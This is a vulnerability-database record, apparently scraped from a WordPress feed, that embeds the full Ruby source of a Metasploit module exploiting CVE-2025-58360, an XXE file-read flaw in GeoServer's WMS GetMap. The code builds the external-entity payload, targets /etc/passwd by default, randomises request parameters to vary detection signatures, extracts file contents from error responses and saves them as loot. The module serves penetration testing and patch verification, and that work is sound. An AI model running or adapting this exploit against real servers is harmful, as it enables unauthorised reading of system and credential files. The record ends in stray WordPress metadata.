{“lastseen”:”2025-12-30T19:04:46″,”description”:”This module exploits an XML External Entity XXE vulnerability in GeoServer via the WMS GetMap operation. The vulnerability allows reading arbitrary files from the server’s file system by injecting an XXE entity in the SLD Styled Layer Descriptor…”,”published”:”2025-12-30T18:58:42″,”modified”:”2025-12-30T18:58:42″,”type”:”metasploit”,”title”:”GeoServer WMS GetMap XXE Arbitrary File Read”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-GEOSERVER_WMS_GETMAP_XXE_FILE_READ-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-58360″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘GeoServer WMS GetMap XXE Arbitrary File Read’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an XML External Entity (XXE) vulnerability in GeoServer\\n via the WMS GetMap operation. The vulnerability allows reading arbitrary files\\n from the server’s file system by injecting an XXE entity in the SLD (Styled Layer Descriptor).\\n\\n Affected versions:\\n – GeoServer \\u003e= 2.26.0, \\u003c= 2.26.1\\n – GeoServer \\u003c= 2.25.5\\n\\n The file content is returned in the error message when the layer name contains\\n the XXE entity reference.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘xbow-security’, # Vulnerability discovery\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’, # Metasploit module\\n ‘Julien Voisin’ # Randomization suggestions\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-58360’],\\n [‘URL’, ‘https:\/\/github.com\/geoserver\/geoserver\/security\/advisories\/GHSA-fjf5-xgmq-5525’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-11-25’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘The base path to GeoServer’, ‘\/geoserver’]),\\n OptString.new(‘FILEPATH’, [true, ‘The filepath to read on the server’, ‘\/etc\/passwd’])\\n ]\\n )\\n end\\n\\n def build_xxe_payload(file_path)\\n entity_name = Rex::Text.rand_text_alpha_lower(8)\\n %(\\u003c?xml version=\\”#{rand(2) == 0 ? ‘1.0’ : ‘1.1’}\\” encoding=\\”UTF-8\\”?\\u003e\\n\\u003c!DOCTYPE StyledLayerDescriptor [\\n\\u003c!ENTITY #{entity_name} SYSTEM \\”file:\/\/#{file_path}\\”\\u003e\\n]\\u003e\\n\\u003cStyledLayerDescriptor version=\\”#{rand(2) == 0 ? ‘1.0.0’ : ‘1.1.0’}\\”\\u003e\\n\\u003cNamedLayer\\u003e\\u003cName\\u003e\\u0026#{entity_name};\\u003c\/Name\\u003e\\u003c\/NamedLayer\\u003e\\n\\u003c\/StyledLayerDescriptor\\u003e)\\n end\\n\\n def build_wms_uri\\n min_x = rand(-180.0..180.0).round(2)\\n min_y = rand(-90.0..90.0).round(2)\\n params = {\\n ‘service’ =\\u003e ‘WMS’,\\n ‘version’ =\\u003e [‘1.0.0’, ‘1.1.1’, ‘1.3.0’].sample,\\n ‘request’ =\\u003e ‘GetMap’,\\n ‘width’ =\\u003e rand(100..500),\\n ‘height’ =\\u003e rand(100..500),\\n ‘format’ =\\u003e [‘image\/png’, ‘image\/jpeg’, ‘image\/gif’].sample,\\n ‘bbox’ =\\u003e [min_x, min_y, rand(min_x..180.0).round(2), rand(min_y..90.0).round(2)].join(‘,’)\\n }\\n \\”#{normalize_uri(target_uri.path, ‘wms’)}?#{params.to_a.shuffle.map { |k, v| \\”#{k}=#{v}\\” }.join(‘\\u0026’)}\\”\\n end\\n\\n def extract_file_content(response_body)\\n match = response_body.match(%r{Unknown layer:\\\\s*([\\\\s\\\\S]+?)\\u003c\/ServiceException\\u003e})\\n return nil unless match\\n\\n content = match[1]\\u0026.strip\\n content\\u0026.empty? ? nil : content\\n end\\n\\n def send_xxe_request\\n uri = build_wms_uri\\n print_status(\\”Sending XXE payload to #{uri}\\”)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e uri,\\n ‘ctype’ =\\u003e ‘application\/xml’,\\n ‘data’ =\\u003e build_xxe_payload(datastore[‘FILEPATH’])\\n })\\n\\n fail_with(Failure::Unreachable, ‘No response from server’) unless res\\n unless res.code == 200\\n fail_with(Failure::UnexpectedReply, \\”Server returned unexpected status code: #{res.code}\\”)\\n end\\n\\n res\\n end\\n\\n def run\\n print_status(\\”Attempting to read file: #{datastore[‘FILEPATH’]}\\”)\\n\\n res = send_xxe_request\\n file_content = extract_file_content(res.body)\\n\\n unless file_content\\n return print_error(‘XXE exploitation failed – file content not found in response’)\\n end\\n\\n print_good(\\”Successfully read file: #{datastore[‘FILEPATH’]}\\”)\\n print_line\\n print_line(file_content)\\n print_line\\n\\n print_good(\\”File saved to: #{store_loot(\\n ‘geoserver.file’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n file_content,\\n File.basename(datastore[‘FILEPATH’]),\\n ‘File read from GeoServer via XXE (CVE-2025-58360)’\\n )}\\”)\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/geoserver_wms_getmap_xxe_file_read.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/geoserver_wms_getmap_xxe_file_read\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-30T19:04:46″,”description”:”This module exploits an XML External Entity XXE vulnerability in GeoServer via the WMS GetMap operation. The vulnerability allows reading arbitrary files from the server’s…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-33341","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n